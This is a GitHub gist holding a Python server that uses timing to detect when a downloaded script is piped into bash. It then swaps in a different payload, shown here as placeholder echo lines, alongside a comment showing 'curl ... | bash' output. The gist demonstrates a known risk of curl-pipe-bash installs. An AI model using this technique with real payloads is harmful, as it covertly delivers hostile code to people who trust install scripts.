Skip to content

Instantly share code, notes, and snippets.

@altescy
Last active July 31, 2024 14:48
Show Gist options
  • Save altescy/47aad2417b8b1ae0610c9283f19e201f to your computer and use it in GitHub Desktop.
Save altescy/47aad2417b8b1ae0610c9283f19e201f to your computer and use it in GitHub Desktop.
Detecting bash execution via HTTP request (originally from https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/)
import dataclasses
import datetime
import re
import socket
import socketserver
import time
class config:
SOCKET_TIMEOUT = 10
BUFFER_SIZE = 87380
PACKET = (
"HTTP/1.1 200 OK\n"
+ "Server: Apache\n"
+ "Content-Type: text/plain; charset=us-ascii\n"
+ "Transfer-Encoding: chunked\n"
+ "Connection: keep-alive\n\n"
)
MAX_PADDING = 16
PADDING = chr(0) * BUFFER_SIZE
@dataclasses.dataclass
class Payload:
null: str = "sleep 3\n"
good: str = "echo 'Hello there :)'\n"
bad: str = "echo 'This is a malicious script :D'\n"
min_jump: float = 2.0
max_variance: float = 0.1
def var(values: list[float]) -> float:
mean = sum(values) / len(values)
variance = sum((x - mean) ** 2 for x in values) / len(values)
return variance
def popmax(values: list[float]) -> float:
max_value = max(values)
values.pop(values.index(max_value))
return max_value
class HTTPHandler(socketserver.BaseRequestHandler):
PAYLOADS: dict[str, Payload] = {}
def sendchunk(self, chunk: str) -> None:
self.request.sendall(bytes(f"{len(chunk):x}\n", "us-ascii"))
self.request.sendall(bytes(chunk, "us-ascii"))
self.request.sendall(bytes("\n", "us-ascii"))
def log(self, message: str) -> None:
print(
f"[{datetime.datetime.now().isoformat()}] "
f"{self.client_address[0]} {message}"
)
def handle(self) -> None:
self.log("Inbuond request")
self.request.settimeout(config.SOCKET_TIMEOUT)
self.request.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.request.setsockopt(
socket.SOL_SOCKET,
socket.SO_SNDBUF,
config.BUFFER_SIZE,
)
data = None
try:
data = str(self.request.recv(1024), "us-ascii")
except socket.timeout:
self.log("No data received")
return
uri = re.search(r"GET ([^ ]+) HTTP/[0-9.]+", data)
if not uri:
self.log("HTTP request malformed")
return
request_uri = uri.group(1)
self.log(f"Request for shell script {request_uri}")
if request_uri not in self.PAYLOADS:
self.log(f"No payload found for {request_uri}")
return
self.request.sendall(bytes(config.PACKET, "us-ascii"))
payload = self.PAYLOADS[request_uri]
self.sendchunk(payload.null)
if not re.search("User-Agent: (curl|Wget)", data):
self.sendchunk(payload.good)
self.sendchunk("")
self.log("Request not via wget/curl. Returning good payload.")
return
timing = []
stime = time.time()
for _ in range(config.MAX_PADDING):
self.sendchunk(config.PADDING)
etime = time.time()
timing.append(etime - stime)
max_array = [t - s for s, t in zip(timing, timing[1:])]
jump = popmax(max_array)
variance = var(max_array)
self.log(f"Maximum Jump: {jump}, Variance: {variance}")
if variance < payload.max_variance and jump > payload.min_jump:
self.log("Execution through bash detected - sending bad payload :D")
self.sendchunk(payload.bad)
else:
self.log("Sending good payload :(")
self.sendchunk(payload.good)
self.sendchunk("")
self.log("Connection closed")
class BashDetectionServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address: tuple[str, int]) -> None:
super().__init__(server_address, HTTPHandler)
def setpayload(self, uri: str, payload: Payload) -> None:
HTTPHandler.PAYLOADS[uri] = payload
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 5555
server = BashDetectionServer((HOST, PORT))
server.setpayload("/setup.sh", Payload())
print(f"Listening on http://{HOST}:{PORT}")
server.serve_forever()
@altescy
Copy link
Author

altescy commented Dec 27, 2022

Execution result:

❯ curl -o -  http://localhost:5555/setup.sh
sleep 3
echo 'Hello there :)'

❯ curl -o -  http://localhost:5555/setup.sh | bash
This is a malicious script :D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment